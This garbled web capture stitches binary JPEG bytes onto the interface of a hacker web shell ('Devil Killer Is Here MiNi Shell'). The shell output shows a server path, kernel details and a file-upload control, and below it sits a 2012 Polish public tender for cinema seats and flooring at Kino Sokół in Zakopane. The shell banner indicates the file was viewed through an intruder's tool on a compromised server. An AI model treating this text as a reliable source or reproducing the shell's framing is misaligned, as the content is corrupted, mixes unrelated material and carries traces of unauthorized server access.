JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120629/141555-N-2012.html

<p class="kh_header"><b>Zakopane: Dostawę  i montaż foteli kinowych dla Kina SOKÓŁ w Zakopanem , demontaż i zabezpieczenie starych foteli, wyrównanie podłogi, dostawa i montaż wykładziny podłogowej</b><br>
<b>Numer ogłoszenia: 141555 - 2012; data zamieszczenia: 29.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Towarzystwo Gimnastyczne "Sokół" Gniazdo w Zakopanem , ul. Orkana 2, 34-500 Zakopane, woj. małopolskie, tel. 18 2064 156, faks 18 20 64 156.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sokol.zakopane.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Organizacja pożytku  publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawę  i montaż foteli kinowych dla Kina SOKÓŁ w Zakopanem , demontaż i zabezpieczenie starych foteli, wyrównanie podłogi, dostawa i montaż wykładziny podłogowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i montaż foteli kinowych dla Kina SOKÓŁ w Zakopanem  demontaż i zabezpieczenie starych foteli, wyrównanie podłogi, dostawa i montaż wykładziny podłogowej

Opis przedmiotu zamówienia:

Przedmiotem zamówienia jest dostawa i montaż nowych foteli kinowych w ilości 201 (w tym 144 przeznaczone do szybkiego demontażu i zmiany ustawienia) oraz 22 strapontenów. Dostawa obejmuje: demontaż i zabezpieczenie starych foteli oraz częściowo położonej wykładziny, wyrównanie podłogi felcowanymi płytami OSB, montaż wykładziny na podłodze oraz transport i montaż zakupionych foteli w kinie SOKÓŁ w Zakopanem, przy ul. Orkana 2 w Zakopanem, w budynku należącym do Towarzystwa Gimnastycznego SOKÓŁ Gniazdo w Zakopanem, a także koszty związane z cłem, opłatami i podatkami oraz koszty dodatkowych materiałów (śrób, wkrętów, kleju, gruntu itp.) jakie Wykonawca zmuszony jest ponieść w celu realizacji przedmiotu umowy.

Szczegółowe wymagania związane z realizacją przedmiotu zamówienia:

1.	Prace przygotowawcze:
a) demontaż starych foteli - 199 sztuk i ich zabezpieczenie
b) usunięcie z podłogi starej wykładziny - 80m2 i jej zabezpieczenie

2.	Wyrównanie podłogi i montaż nowej wykładziny podłogowej:
a) wyrównanie podłogi ze starych desek felcowanymi płytami OSB; grubość płyt 1-2 cm, składanie płyt bezfugowe - 180m2 (+  -5%)
b) montaż nowej wykładziny podłogowej - 180m2 (+ -5%), struktura runa: welur; przeznaczenie: biura, hotele, korytarze, kina, odporna na kółka od krzeseł; skład: 100% Poliamid; wysokość runa: min. 3.8mm; gramatura runa: min. 550g m2; gęstość runa: min. 0,10g cm3; ilość igłowań na m2: min. 300.000; dowolny wzór z min. 6 kolorów; spód wykładziny: filc min. 500g m2; wykładzina musi spełniać wymogi odnośnie przepisów przeciwpożarowych, bhp oraz sanitarnych potwierdzone polskimi atestami
c) wraz z ofertą należy dostarczyć próbkę wykładziny wraz z wzornikiem dostępnych kolorów

3.	Fotele:
a) ustawienie i montaż foteli zgodnie z załączoną aranżacją - zał. 7, rys.1
b) pierwsze osiem rzędów, muszą posiadać system szybkiego demontażu i mieć możliwość ustawienia wg nowej aranżacji - zał. 7, rys.2; nieużywane otwory po poprzednim ustawieniu foteli powinny posiadać zaślepienia 
c) wymiary fotela: 
- wysokość całkowita: 95-105cm
- szerokość po osiach podłokietników: 53-57cm
- głębokość złożonego fotela: 42-46cm
- głębokość siedziska po rozłożeniu: 45-55cm
d) rozkład i sposób zamontowania foteli musi spełniać wymogi aktualnych przepisów i norm, a w szczególności § 261 Rozporządzenia Ministra Infrastruktury z 12 kwietnia 2002 roku w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U. nr 75 z 2002r., poz. 690 z późniejszymi zmianami)
e) fotele powinny być  dopuszczone do użytkowania zgodnie z obowiązującymi przepisami
f) wraz z ofertą należy dostarczyć oferowany model fotela
g) wraz z fotelem należy dostarczyć karty katalogowe oferowanego modelu fotela i wzornik kolorystyki tapicerki zastosowanej w oferowanym modelu; preferowany wzór: ciemna tapicerka z jasnymi elementami (np. kropki); możliwość wyboru różnych kolorów w różnych rzędach 
h) Zamawiający dopuszcza rozwiązania równoważne. Obowiązek udowodnienia równoważności spoczywa na oferującym poprzez przedstawienie modelu proponowanego fotela  oraz wzornika tapicerek, atestów i certyfikatów
i) stopa fotela - wykonana z profilowanej, tłoczonej blachy o wysokości min. 25mm (trwały i estetyczny element - brak widocznych spawów)
j) konstrukcja nośna - wykonana z profili metalowych - wspornik nogi wykonany z profilu min. 60x30x2mm
k) oparcie i siedzisko - trudno-zapalne, profilowane z pianki PU wykonane w technologii wtrysku do formy. Wewnątrz pianek zatopione powinny być metalowe stelaże stanowiące element nośny konstrukcji podnoszący  wytrzymałość i odporność na odkształcenia.
l) tkanina trudno-zapalna - integralna z formatką oparcia (połączenie układu tapicerskiego z formatką oparcia powinno być wykonane próżniowo podczas procesu formowania pianki w formie bez użycia kleju, zszywek, itp.)
ł) podłokietniki - integralna pianka poliuretanowa w kolorze czarnym, o  szerokości 6-8 cm 
m) boki fotela - tapicerowane zewnętrzne w rzędzie
n) osłona oparcia - profilowana 3D zasłaniająca częściowo boki formatki oparcia w celu zabezpieczenia tylnych rantów przed deformacją, stanowiąca jednocześnie konstrukcję nośną oparcia, wykonana z tworzywa PP (polipropylen)
o) osłona siedziska - wykonana z tworzywa PP (polipropylen)
p) pokrowiec na siedzisko - zapinany na zamek błyskawiczny
r) mechanizm składania siedziska - sprężynowy z systemem 2 szt. niezależnych sprężyn zatopionych w ramie siedziska. Siedzisko powinno być mocowane w taki sposób aby możliwa była wymiana siedziska, bez potrzeby rozkręcania pozostałych elementów fotela. Elementy mocujące siedzisko montowane do nogi fotela
s) opis tapicerki: dzianina typu TREVIRA CS  z atestem na ścieralność min 30.000 cykli
t) numeracja rzędów i foteli: haft komputerowy - projekt do zatwierdzenia przez Zamawiającego; wszystkie fotele numerowane; numeracja rzędów na tapicerowanym boku skrajnego fotela, cyfry rzymskie; numeracja miejsc umieszczona na oparciu fotela, cyfry arabskie
u) mocowanie fotela do podłoża winno zapewniać jego stabilność oraz łatwy, powtarzalny montaż i demontaż
w)materiały stosowane przez Wykonawcę podczas realizacji przedmiotu umowy powinny być fabrycznie nowe i odpowiadać, co do jakości wymogom wyrobów dopuszczonych do obrotu, stosowanych w budownictwie zgodnie z art. 10 Ustawy z dnia 07.07.1994 Prawo budowlane, oraz jakościowym i gatunkowym wymaganiom określonym w niniejszej SIWZ

4.	Wymagane atesty i certyfikaty:
- Atest (sprawozdanie) z badań wytrzymałościowych w zakresie bezpieczeństwa użytkowania, wg PN-EN 12727:2004
- Atest higieniczny - wydany przez Narodowy Instytut Zdrowia Publicznego-Państwowy Zakład Higieny
- Atest (sprawozdanie) z badań zapalności mebli tapicerowanych wg PN-EN 1021-1:2007 i PN-EN 1021-2:2007
- Atest (sprawozdanie) z badań lotnych toksycznych produktów spalania materiałów dla zestawu tapicerskiego składającego się z tkaniny z podklejoną pianką  oraz z wypełnienia pianki PU  
- Atest (sprawozdanie) wytrzymałościowy na odkształcanie pianki siedziska-min.100.000 cykli, wg PN-ISO 2439-2000

5.	Straponteny:
a) Zamówienie obejmuje dostawę wraz montażem 22 sztuk strapontenów, spełniających wymogi przeciwpożarowe i BHP
b) straponteny montowane będą do skrajnych foteli w rzędach od 1 do 10
c) siedzisko - profilowane, wykonane metodą wtryskową z wysokogatunkowej trudno-zapalnej pianki PU. Wewnątrz pianek zatopione metalowe stelaże stanowiące element nośny konstrukcji, kształtem i formą nawiązujące
do siedziska fotela
d) osłona siedziska - wykonana z tworzywa PP (polipropylen)
e) mechanizm składania siedziska - sprężynowy z systemem 2 szt. niezależnych sprężyn zatopionych w ramie siedziska. Siedzisko powinno być mocowane w taki sposób aby możliwa była wymiana siedziska, bez potrzeby rozkręcania pozostałych elementów fotela
f) tapicerka identyczna jak tapicerka foteli
g) atesty i certyfikaty jak przy fotelach

Wykonawca zobowiązany jest:

a) udzielić co najmniej 3 lata gwarancji na oferowany przedmiot zamówienia licząc od daty bezusterkowego odbioru przedmiotu zamówienia (tj. po położeniu podłogi, ułożeniu wykładziny i zamontowaniu foteli)
b) udzieli  dożywotniej gwarancji na mechanizm zamykania i otwierania foteli
c) zapewnić bezpłatny serwis gwarancyjny w siedzibie Zamawiającego w trakcie trwania okresu gwarancyjnego
d) dostarczyć na własny koszt przedmiot niniejszego zamówienia do kina SOKÓŁ w Zakopanem, przy ul. Orkana 2
e)dokonać przekazania przedmiotu umowy wraz z niezbędnymi dokumentami w siedzibie Zamawiającego na podstawie protokołu odbioru
f) wykonać  dokumentację powykonawczą wraz z kompletem niezbędnych  certyfikatów, deklaracji zgodności, atestów, kart gwarancyjnych
g) wszelkie prace i naprawy muszą odbywać się w terminach uzgodnionych z Zamawiającym tak by nie kolidowały z bieżącą działalnością kina
h) prowadzić roboty składające się na przedmiot umowy z należytą starannością, zgodnie z SIWZ, obowiązującymi polskimi normami i przepisami prawa, zasadami współczesnej wiedzy technicznej i uzgodnieniami dokonanymi w trakcie realizacji robót


              Zamawiający informuje, że ilekroć przedmiot zamówienia określony w siwz i w   załącznikach  do specyfikacji istotnych warunków zamówienia opisany jest przez wskazanie znaku towarowego, patentu lub pochodzenia dopuszcza się rozwiązania równoważne, z zastrzeżeniem, iż proponowane rozwiązania (materiały, urządzenia) będą posiadały parametry techniczne nie gorsze niż wymagane przez zamawiającego , posiadały wymagane  atesty , spełniały normy. Wykazanie równoważności zaoferowanego przedmiotu spoczywa na Wykonawcy, który jest obowiązany wykazać, że oferowane przez niego   dostawy  ( w tym m.in. proponowane materiały, urządzenia) spełniają wymagania określone przez zamawiającego w  siwz W takim wypadku  należy  do wykonawcy przedstawienie modelu proponowanego fotela  oraz wzornika tapicerek, atestów i certyfikatów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.11.31.00-8, 44.11.22.00-0, 45.43.21.11-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 11.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Każdy wykonawca jest zobowiązany wnieść wadium przetargowe w wysokości  4.000,00 zł ( słownie: cztery tysiące  złotych) 

2.	Wadium może być wnoszone w jednej lub w kilku  następujących formach: 
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
2) poręczeniach bankowych;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 lit. b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn.zm.).

3.	Wadium przetargowe w  pieniądzu należy wnieść  przelewem na konto  Towarzystwa Gimnastycznego Sokół Gniazdo w Zakopanem nr w Bank Pekao SA. Oddział Zakopane nr konta ; 65 1240 5165 1111 0000 5229 6237
4.	Wadium powinno znajdować się na koncie zamawiającego najpóźniej w terminie składania ofert tj.12 lipca  2012r.  do godz.  12:00
Wadium wnoszone w pozostałych formach należy złożyć w postaci oryginału, najpóźniej w terminie składania ofert tj. 12 lipca 2012r.do godz.; 12:00 00w  Biurze Towarzystwa Gimnastycznego Sokół w Zakopanem ul. Orkana 2
        
  UWAGA! Nie wolno oryginałów tych dokumentów wkładać do oferty.

ZWROT WADIUM : 
1.Zamawiający zwraca wadium  wszystkim wykonawcom niezwłocznie po wyborze oferty   najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza , z zastrzeżeniem ,że  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na     wezwanie, o którym mowa w art. 26 ust. 3ustawy  nie złożył dokumentów lub oświadczeń, o    których mowa w art. 25 ust. 1 ustawy,  lub pełnomocnictw, chyba że udowodni, że wynika to z  przyczyn nieleżących po jego stronie. 

2.Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy który wycofał ofertę przed upływem terminu składania ofert;
           3. Zamawiający żąda  ponownego wniesienia wadium przez wykonawcę którym zwrócono wadium na podstawie ust.1  jeżeli w wyniku   rozstrzygnięcia  odwołania  jego oferta została  wybrana jako najkorzystniejsza. Wykonawca wnosi wadium  w terminie określonym przez Zamawiającego.
     4. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku banko?wego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
    
5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca wykaże ,ze   że w ciągu ostatnich 3 lat przed  upływem terminu składania ofert  a jeżeli okres prowadzenia działalności jest krótszy w tym okresie zrealizował  co  najmniej  1 dostawę  polegająca na dostawie i montażu co najmniej 100 sztuk ( słownie: sto sztuk )  foteli kinowych.
 

Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Wygoda siedzenia na fotelu - 20</li>
<li>3 - Estetyka i jakość wykonania fotela - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W oparciu o art.144 ust.1 ustawy zamawiający informuje, że przewiduje możliwość zmiany umowy w następujących przypadkach: 

1)	zaistnienia zmian w przepisach prawnych istotnych dla realizacji umowy,
2)	ustawowej zmiany stawki podatku VAT z zastrzeżeniem, że zmianie ulegnie kwota brutto,  wynagrodzenia a kwota netto pozostanie niezmieniona</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sokol.zakopane.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Towarzystwa Gimnastycznego  Sokół   
ul. Orkana 2
34-500 Zakopane.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.07.2012 godzina 12:00, miejsce: Biuro Towarzystwa Gimnastycznego  Sokół   
ul. Orkana 2
34-500 Zakopane.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osoba uprawniona do porozumiewania się z wykonawcami:

Pan  Jakub Krajewski  -Kierownik Kina  Sokół  
telefon 18 2014040    faks : 18 2064156     
Telefon komórkowy: 602462962,  mail: kinosokol_zakopane@wp.pl


Wymagany termin   realizacji zamówienia: od  daty podpisania umowy-
a/ data wejścia do kina: nie później niż 01.10.2012 r.
b/ nieprzekraczalny termin realizacji zamówienia: do dnia 11.10.2012 r.

    Zamawiający zastrzega sobie aby szczegółowe terminy dostaw i montażu  uzgodnić  z Zamawiającym

          Dokumenty jakie należy załączyć do oferty na potwierdzenie ,że oferowane dostawy odpowiadają wymaganiom zamawiającego: 
 
            Wykonawca zobowiązany jest załączyć do swojej oferty  na potwierdzenie, że oferowane dostawy  odpowiadają wymaganiom zamawiającego dokładny opis ( marka, producent , specyfikacja techniczna itp.) proponowanych foteli oraz wykładziny   wzorniki   w tym tapicerek, atesty  oraz dostarczyć na swój koszt  próbkę oferowanego przedmiotu dostawy w postaci  1 sztuki proponowanego fotela kinowego i  wykładziny o wymiarach  20 x 30 cm.</p>
